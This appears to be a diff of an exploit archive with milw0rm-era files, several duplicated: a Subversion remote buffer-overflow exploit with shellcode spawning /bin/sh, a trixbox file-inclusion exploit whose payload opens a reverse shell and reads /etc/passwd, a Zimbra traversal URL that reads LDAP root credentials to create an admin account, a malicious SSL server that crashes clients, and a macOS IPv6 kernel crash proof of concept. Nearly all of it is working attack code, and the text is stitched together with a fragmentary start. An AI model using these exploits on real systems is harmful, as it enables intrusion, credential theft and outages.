printf("\nConnecting to the shell...\n");
exec_sh(connect_sh()); */
return 0;
}
// milw0rm.com [2005-05-03]
/*****************************************************************
* hoagie_subversion.c
*
* Remote exploit against Subversion-Servers.
*
* Author: greuff <greuff@void.at>
*
* Tested on Subversion 1.0.0 and 0.37
*
* Algorithm:
* This is a two-stage exploit. The first stage overflows a buffer
* on the stack and leaves us ~60 bytes of machine code to be
* executed. We try to find the socket-fd there and then do a
* read(2) on the socket. The exploit then sends the second stage
* loader to the server, which can be of any length (up to the
* obvious limits, of course). This second stage loader spawns
* /bin/sh on the server and connects it to the socket-fd.
*
* Credits:
* void.at
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
*
*****************************************************************/
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
enum protocol { SVN, SVNSSH, HTTP, HTTPS };
char stage1loader[]=
// begin socket fd search
"\x31\xdb" // xor %ebx, %ebx
"\x90" // nop (UTF-8)
"\x53" // push %ebx
"\x58" // pop %eax
"\x50" // push %eax
"\x5f" // pop %edi # %eax = %ebx = %edi = 0
"\x2c\x40" // sub $0x40, %al
"\x50" // push %eax
"\x5b" // pop %ebx
"\x50" // push %eax
"\x5a" // pop %edx # %ebx = %edx = 0xC0
"\x57" // push %edi
"\x57" // push %edi # safety-0
"\x54" // push %esp
"\x59" // pop %ecx # %ecx = pointer to the buffer
"\x4b" // dec %ebx # beginloop:
"\x57" // push %edi
"\x58" // pop %eax # clear %eax
"\xd6" // salc (UTF-8)
"\xb0\x60" // movb $0x60, %al
"\x2c\x44" // sub $0x44, %al # %eax = 0x1C
"\xcd\x80" // int $0x80 # fstat(i, &stat)
"\x58" // pop %eax
"\x58" // pop %eax
"\x50" // push %eax
"\x50" // push %eax
"\x38\xd4" // cmp %dl, %ah # uppermost 2 bits of st_mode set?
"\x90" // nop (UTF-8)
"\x72\xed" // jb beginloop
"\x90" // nop (UTF-8)
"\x90" // nop (UTF-8) # %ebx now contains the socket fd
// begin read(2)
"\x57" // push %edi
"\x58" // pop %eax # zero %eax
"\x40" // inc %eax
"\x40" // inc %eax
"\x40" // inc %eax # %eax=3
//"\x54" // push %esp
//"\x59" // pop %ecx # %ecx ... address of buffer
//"\x54" // push %edi
//"\x5a" // pop %edx # %edx ... bufferlen (0xC0)
"\xcd\x80" // int $0x80 # read(2) second stage loader
"\x39\xc7" // cmp %eax, %edi
"\x90" // nop (UTF-8)
"\x7f\xf3" // jg startover
"\x90" // nop (UTF-8)
"\x90" // nop (UTF-8)
"\x90" // nop (UTF-8)
"\x54" // push %esp
"\xc3" // ret # execute second stage loader
"\x90" // nop (UTF-8)
"\0" // %ebx still contains the fd we can use in the 2nd stage loader.
;
char stage2loader[]=
// dup2 - %ebx contains the fd
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x00\x00\x00\x00" // mov $0x0, %ecx
"\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x01\x00\x00\x00" // mov $0x1, %ecx
"\xcd\x80" // int $0x80
"\xb8\x3f\x00\x00\x00" // mov $0x3F, %eax
"\xb9\x02\x00\x00\x00" // mov $0x2, %ecx
"\xcd\x80" // int $0x80
// start /bin/sh
"\x31\xd2" // xor %edx, %edx
"\x52" // push %edx
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xb8\x0b\x00\x00\x00" // mov $0xb, %eax
"\xcd\x80" // int $0x80
"\xb8\x01\x00\x00\x00" // mov $0x1, %eax
"\xcd\x80" // int %0x80 (exit)
;
int stage2loaderlen=69;
char requestfmt[]=
"REPORT %s HTTP/1.1\n"
"Host: %s\n"
"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n"
"Content-Length: %d\n"
"Content-Type: text/xml\n"
"Connection: close\n\n"
"%s\n";
char xmlreqfmt[]=
"<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">"
"<D:creationdate>%s%c%c%c%c</D:creationdate>"
"</S:dated-rev-report>";
int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000])
{
char *ptr;
char bfr[1000];
ptr=strstr(uri,"://");
if(!ptr) return -1;
*ptr=0;
snprintf(bfr,sizeof(bfr),"%s",uri);
if(!strcmp(bfr,"http"))
*proto=HTTP, *port=80;
else if(!strcmp(bfr,"svn"))
*proto=SVN, *port=3690;
else
{
printf("Unsupported protocol %s\n",bfr);
return -1;
}
uri=ptr+3;
if((ptr=strchr(uri,':')))
{
*ptr=0;
snprintf(host,1000,"%s",uri);
uri=ptr+1;
if((ptr=strchr(uri,'/'))==NULL) return -1;
*ptr=0;
snprintf(bfr,1000,"%s",uri);
*port=(int)strtol(bfr,NULL,10);
*ptr='/';
uri=ptr;
}
else if((ptr=strchr(uri,'/')))
{
*ptr=0;
snprintf(host,1000,"%s",uri);
*ptr='/';
uri=ptr;
}
snprintf(repos,1000,"%s",uri);
return 0;
}
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int main(int argc, char **argv)
{
int sock, port;
size_t size;
char cmd[1000], reply[1000], buffer[1000];
char svdcmdline[1000];
char host[1000], repos[1000], *ptr, *caddr;
unsigned long addr;
struct sockaddr_in sin;
struct hostent *he;
enum protocol proto;
/*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666);
write(sock,stage1loader,strlen(stage1loader));
close(sock);
return 0;*/
printf("hoagie_subversion - remote exploit against subversion servers\n"
"by greuff@void.at\n\n");
if(argc!=3)
{
printf("Usage: %s serverurl offset\n\n",argv[0]);
printf("Examples:\n"
" %s svn://localhost/repository 0x41414141\n"
" %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
printf("The offset is an alphanumeric address (or UTF-8 to be\n"
"more precise) of a pop instruction, followed by a ret.\n"
"Brute force when in doubt.\n\n");
printf("When exploiting against an svn://-url, you can supply a\n"
"binary offset too.\n\n");
exit(1);
}
// parse the URI
snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
if(parse_uri(argv[1],&proto,host,&port,repos)<0)
{
printf("URI parse error\n");
exit(1);
}
printf("parse_uri result:\n"
"Protocol: %d\n"
"Host: %s\n"
"Port: %d\n"
"Repository: %s\n\n",proto,host,port,repos);
addr=strtoul(argv[2],NULL,16);
caddr=(char *)&addr;
printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock<0)
{
perror("socket");
return -1;
}
he=gethostbyname(host);
if(he==NULL)
{
herror("gethostbyname");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
if(proto==SVN)
{
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]);
write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply));
reply[size]=0;
printf("Server said: %s\n",reply);
}
else if(proto==HTTP)
{
// preparing the request...
snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]);
size=strlen(buffer);
snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);
// now sending the request, immediately followed by the 2nd stage loader
printf("Sending:\n%s",cmd);
write(sock,cmd,strlen(cmd));
sleep(1);
write(sock,stage2loader,stage2loaderlen);
}
// SHELL LOOP
printf("Entering shell loop...\n");
exec_sh(sock);
/*sleep(1);
close(sock);
printf("\nConnecting to the shell...\n");
exec_sh(connect_sh()); */
return 0;
}
// milw0rm.com [2005-05-03]

View file

@ -1,134 +1,134 @@
#!/usr/bin/perl -w
# Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit
# 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
#
# perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
# 1> Remote TCP shell
# 2> Read local file
# 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...
# nc -l -v -p 4444
# listening on [any] 4444 ...
# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397
# bash: no job control in this shell
# bash-3.1# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# bash-3.1#
use strict;
use Switch;
use LWP::UserAgent;
use HTTP::Cookies;
usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);
menu();
sub execScript{
my $scriptCode = shift;
post($scriptCode);
my $phpsessionid = extractPHPSID($cookie_jar->as_string);
post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}
sub post{
my $postData = shift;
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content($postData);
my $res = $ua->request($req);
my $content = $res->content;
return $content;
}
sub readFile{
my $file = shift;
my $content = post("langChoice=../../../../../../../../../..$file%00");
my @fileLines = split(/\n/,$content);
my $fileContent = "Content of $file: \n\n";
for(my $i=3;$i<@fileLines;$i++){
last if($fileLines[$i] =~ m/trixbox - User Mode/);
$fileContent = $fileContent . $fileLines[$i-3] . "\n";
}
return $fileContent;
}
sub tcp_reverse_shell{
my $rhost= shift;
my $rport = shift;
my $uid = shift;
my $rshell;
if($uid eq "asterisk"){
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00";
}else{
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00";
}
execScript($rshell);
}
sub extractPHPSID{
$_ = shift;
if(/PHPSESSID=(\w+)/){
return $1;
}
}
sub menu{
print <<EOF;
Please listen carefully as our menu option has changed
Choose from the following options:
1> Remote TCP shell
2> Read local file
EOF
my $option = <STDIN>;
chop($option);
switch($option){
case 1 {
print "Host and port the reverse shell should connect to ? ";
print "(<host>:<port>): ";
my $hp=<STDIN>;
chop($hp);
print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]";
my $uid=<STDIN>;
chop($uid);
my($rhost,$rport) = split(/:/,$hp);
print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";
print "Press enter to continue...";
<STDIN>;
tcp_reverse_shell($rhost,$rport,$uid);
print "done...\n";
}
case 2 {
while(1){
print "Full path (e.g. /etc/passwd): ";
my $file = <STDIN>;
chop($file);
print readFile($file) . "\n\n";
}
}
}
}
sub usage{
print "./trixbox_fi.pl <host>\n";
exit 1;
}
# milw0rm.com [2008-07-09]
#!/usr/bin/perl -w
# Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit
# 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
#
# perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
# 1> Remote TCP shell
# 2> Read local file
# 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...
# nc -l -v -p 4444
# listening on [any] 4444 ...
# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397
# bash: no job control in this shell
# bash-3.1# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# bash-3.1#
use strict;
use Switch;
use LWP::UserAgent;
use HTTP::Cookies;
usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);
menu();
sub execScript{
my $scriptCode = shift;
post($scriptCode);
my $phpsessionid = extractPHPSID($cookie_jar->as_string);
post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}
sub post{
my $postData = shift;
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content($postData);
my $res = $ua->request($req);
my $content = $res->content;
return $content;
}
sub readFile{
my $file = shift;
my $content = post("langChoice=../../../../../../../../../..$file%00");
my @fileLines = split(/\n/,$content);
my $fileContent = "Content of $file: \n\n";
for(my $i=3;$i<@fileLines;$i++){
last if($fileLines[$i] =~ m/trixbox - User Mode/);
$fileContent = $fileContent . $fileLines[$i-3] . "\n";
}
return $fileContent;
}
sub tcp_reverse_shell{
my $rhost= shift;
my $rport = shift;
my $uid = shift;
my $rshell;
if($uid eq "asterisk"){
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00";
}else{
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00";
}
execScript($rshell);
}
sub extractPHPSID{
$_ = shift;
if(/PHPSESSID=(\w+)/){
return $1;
}
}
sub menu{
print <<EOF;
Please listen carefully as our menu option has changed
Choose from the following options:
1> Remote TCP shell
2> Read local file
EOF
my $option = <STDIN>;
chop($option);
switch($option){
case 1 {
print "Host and port the reverse shell should connect to ? ";
print "(<host>:<port>): ";
my $hp=<STDIN>;
chop($hp);
print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]";
my $uid=<STDIN>;
chop($uid);
my($rhost,$rport) = split(/:/,$hp);
print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";
print "Press enter to continue...";
<STDIN>;
tcp_reverse_shell($rhost,$rport,$uid);
print "done...\n";
}
case 2 {
while(1){
print "Full path (e.g. /etc/passwd): ";
my $file = <STDIN>;
chop($file);
print readFile($file) . "\n\n";
}
}
}
}
sub usage{
print "./trixbox_fi.pl <host>\n";
exit 1;
}
# milw0rm.com [2008-07-09]

View file

@ -1289,6 +1289,6 @@ int main(int argc, char* argv[])
close(ssl1->sock);
return 0;
}
/* spabam: It isn't 0day */
// milw0rm.com [2003-04-04]
/* spabam: It isn't 0day */
// milw0rm.com [2003-04-04]

View file

@ -0,0 +1,59 @@
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Example :
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
or
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
----------------Exploit-----------------
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
use the exploit like this :
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !
The number of servers vuln are huge like 80/100.
This is only for educational purpouses.

View file

@ -1,55 +1,55 @@
#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response
use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());
while ( $new_sock = $sock->accept() )
{
printf ("new connection\n");
my $rin;
my $line;
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);
my $ciphers = "";
my $ciphers_length = pack('n', length($ciphers));
my $certificate = "";
my $certificate_length = pack('n', length($certificate));
my $packet_sslv2 =
"\x04".
"\x01". # Hit (default 0x01)
"\x00". # No certificate
"\x00\x02".
$certificate_length.
$ciphers_length.
"\x00\x10".
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";
my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
$packet_sslv2 = $ssl_length . $packet_sslv2;
print $new_sock $packet_sslv2;
close($new_sock);
}
# milw0rm.com [2007-12-23]
#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response
use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());
while ( $new_sock = $sock->accept() )
{
printf ("new connection\n");
my $rin;
my $line;
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);
my $ciphers = "";
my $ciphers_length = pack('n', length($ciphers));
my $certificate = "";
my $certificate_length = pack('n', length($certificate));
my $packet_sslv2 =
"\x04".
"\x01". # Hit (default 0x01)
"\x00". # No certificate
"\x00\x02".
$certificate_length.
$ciphers_length.
"\x00\x10".
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";
my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
$packet_sslv2 = $ssl_length . $packet_sslv2;
print $new_sock $packet_sslv2;
close($new_sock);
}
# milw0rm.com [2007-12-23]

View file

@ -1,143 +1,143 @@
/* xnu-ipv6-ipcomp.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC
* by mu-b - Sun 24 Feb 2008
*
* - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386)
* Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386)
*
* ipcomp6_input does not verify the success of the first call
* to m_pulldown (m -> md typo?).
*
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!m) {
* ->
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!md) {
* (bsd/netinet6/ipcomp_input.c)
*
* curiosly the same bug exists in ipcomp4_input, but an explicit
* check is made to ensure there is enough space for the struct ipcomp.
*
* Note: bug independently found by Shoichi Sakane of the KAME project.
* (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
* (http://www.kb.cert.org/vuls/id/110947)
* (http://www.securityfocus.com/bid/27642)
* (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <ifaddrs.h>
#include <libnet.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define IPV6_INTERFACE "eth0"
#define IPV6_SRC_OFFSET 8
#define IPV6_DST_OFFSET 24
#define HAMMER_NUM 8
static unsigned char pbuf[] =
"\x60"
"\x00\x00\x00"
"\x00\x00" /* plen = 0 */
"\x6c" /* nxt_hdr = IPComp */
"\x66"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
static int
get_localip (char *if_name, unsigned int *ip6_addr)
{
struct ifaddrs *ifa_head;
int result;
result = -1;
if (getifaddrs (&ifa_head) == 0)
{
struct ifaddrs *ifa_cur;
ifa_cur = ifa_head;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{
if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 ||
ifa_cur->ifa_addr->sa_family != AF_INET6 ||
!(ifa_cur->ifa_flags & IFF_UP))
continue;
memcpy (ip6_addr,
&(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr),
sizeof (int) * 4);
result = 0;
break;
}
}
freeifaddrs (ifa_head);
}
return (result);
}
int
main (int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128];
unsigned int i, ip6_addr[4];
libnet_t *lnsock;
printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]);
exit (EXIT_FAILURE);
}
if (get_localip (IPV6_INTERFACE,
(unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0)
{
fprintf (stderr, "* get_localip() failed\n");
exit (EXIT_FAILURE);
}
if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0)
{
fprintf (stderr, "* inet_pton() failed\n");
exit (EXIT_FAILURE);
}
memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr);
lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf);
if (lnsock == NULL)
{
fprintf (stderr, "* libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}
inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf);
printf ("* local ipv6 %s...\n", ip6_buf);
printf ("* attacking %s...", argv[1]);
for (i = 0; i < HAMMER_NUM; i++)
libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1);
printf ("done\n");
return (EXIT_SUCCESS);
}
// milw0rm.com [2008-02-26]
/* xnu-ipv6-ipcomp.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC
* by mu-b - Sun 24 Feb 2008
*
* - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386)
* Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386)
*
* ipcomp6_input does not verify the success of the first call
* to m_pulldown (m -> md typo?).
*
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!m) {
* ->
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!md) {
* (bsd/netinet6/ipcomp_input.c)
*
* curiosly the same bug exists in ipcomp4_input, but an explicit
* check is made to ensure there is enough space for the struct ipcomp.
*
* Note: bug independently found by Shoichi Sakane of the KAME project.
* (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
* (http://www.kb.cert.org/vuls/id/110947)
* (http://www.securityfocus.com/bid/27642)
* (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <ifaddrs.h>
#include <libnet.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define IPV6_INTERFACE "eth0"
#define IPV6_SRC_OFFSET 8
#define IPV6_DST_OFFSET 24
#define HAMMER_NUM 8
static unsigned char pbuf[] =
"\x60"
"\x00\x00\x00"
"\x00\x00" /* plen = 0 */
"\x6c" /* nxt_hdr = IPComp */
"\x66"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
static int
get_localip (char *if_name, unsigned int *ip6_addr)
{
struct ifaddrs *ifa_head;
int result;
result = -1;
if (getifaddrs (&ifa_head) == 0)
{
struct ifaddrs *ifa_cur;
ifa_cur = ifa_head;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{
if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 ||
ifa_cur->ifa_addr->sa_family != AF_INET6 ||
!(ifa_cur->ifa_flags & IFF_UP))
continue;
memcpy (ip6_addr,
&(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr),
sizeof (int) * 4);
result = 0;
break;
}
}
freeifaddrs (ifa_head);
}
return (result);
}
int
main (int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128];
unsigned int i, ip6_addr[4];
libnet_t *lnsock;
printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]);
exit (EXIT_FAILURE);
}
if (get_localip (IPV6_INTERFACE,
(unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0)
{
fprintf (stderr, "* get_localip() failed\n");
exit (EXIT_FAILURE);
}
